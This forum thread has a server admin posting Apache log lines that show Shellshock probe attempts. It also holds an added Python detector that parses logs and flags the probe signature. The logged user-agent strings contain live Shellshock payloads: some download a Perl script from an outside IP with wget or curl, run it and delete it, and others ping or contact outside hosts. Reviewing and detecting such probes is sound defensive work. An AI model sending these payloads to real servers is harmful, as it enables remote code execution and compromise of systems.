Shell Shocked

WeaselSqueezer
Posts: 434
Joined: July 22nd, 2004, 8:48 pm
Location: Ann Arbor, Michigan, USA

Shell Shocked

Post by WeaselSqueezer »

Here is a query to see who's been trying to hack this server with the bash bug:

rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log.1
89.207.135.125 - - [25/Sep/2014:06:40:29 -0400] mail.mdve.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:06:42:05 -0400] * "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
94.75.234.44 - - [26/Sep/2014:08:59:35 -0400] 208.64.36.69 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.70 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.73 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.75 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
54.251.83.67 - - [27/Sep/2014:12:41:22 -0400] 208.64.36.75 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [27/Sep/2014:12:54:30 -0400] 208.64.36.73 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
54.251.83.67 - - [29/Sep/2014:01:59:25 -0400] 208.64.36.70 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [29/Sep/2014:07:25:02 -0400] 208.64.36.69 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
98.126.4.18 - - [01/Oct/2014:14:10:19 -0400] darkhq.com "GET /cgi-bin/hi HTTP/1.1" 404 284 "-" "() { :;};echo mizwkafnh7bvh6sk2dr2$(curl 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D'; wget -qO- 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D';)mizwkafnh7bvh6sk2dr2"

Ha ha, go away script kiddies, we're all patched here!
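A defender-side version of the log check above, added here as an example and not part of the original post: it parses access-log lines in the same layout as the ones posted (constructed samples using documentation-range addresses, not the addresses from the post), flags whitespace variants of the probe that a literal grep for `() { :;};` would miss, and summarises hits by source IP.

```python
import re
from collections import Counter

# Same field layout as the lines in the post: client, identd, user, [time],
# vhost/server field, "request", status, bytes, "referer", "user-agent".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] (?P<vhost>\S+) '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# An empty function definition followed by a body is the Shellshock signature.
# Tolerating whitespace catches "() { :; };" and "(){:;};" as well as the
# exact "() { :;};" string the grep in the post looks for.
SHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample lines (RFC 5737 addresses), not the post's own log.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:06:40:29 -0400] www.example.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 203.0.113.5"',
    '192.0.2.11 - - [26/Sep/2014:08:59:35 -0400] 198.51.100.7 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :; }; /bin/bash -c \\"echo probe\\""',
    '192.0.2.12 - - [27/Sep/2014:12:41:22 -0400] 198.51.100.7 "GET / HTTP/1.1" 200 119 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    'garbage line that does not parse',
]

def parse_line(line):
    """Split one access-log line into named fields, or None if it is malformed."""
    m = LINE_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None

def literal_grep(lines):
    """What the post's grep does: an exact substring match only."""
    return [l for l in lines if '() { :;};' in l]

def find_shellshock(lines):
    """One record per line whose UA, referer or request carries the probe."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip unparseable lines rather than crashing mid-file
        for field in ('ua', 'referer', 'request'):
            if SHOCK_RE.search(rec[field]):
                parts = rec['request'].split(' ')
                hits.append({'ip': rec['ip'], 'time': rec['time'],
                             'path': parts[1] if len(parts) > 1 else '',
                             'status': int(rec['status']),
                             'field': field, 'payload': rec[field]})
                break
    return hits

def sources(hits):
    """Count probe lines per source IP, the view most useful for blocking or reporting."""
    return Counter(h['ip'] for h in hits)
```

Run over a real `access_log`, the status column tells you whether the target CGI path even existed (404) or was refused (403), which is why the post's author could laugh it off on a patched host.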

Ponj
DARKie
Posts: 130
Joined: February 16th, 2014, 5:56 pm

Re: Shell Shocked

Post by Ponj »

WeaselSqueezer wrote: Ha ha, go away script kiddies, we're all patched here!
Lulz, we (player.me) were already never vulnerable to this because of us never using apache, cgi (fastcgi isn't vuln), nor exposing anything other than what was necessary. We actually did get quite a few attempts on day zero though, to no avail! :D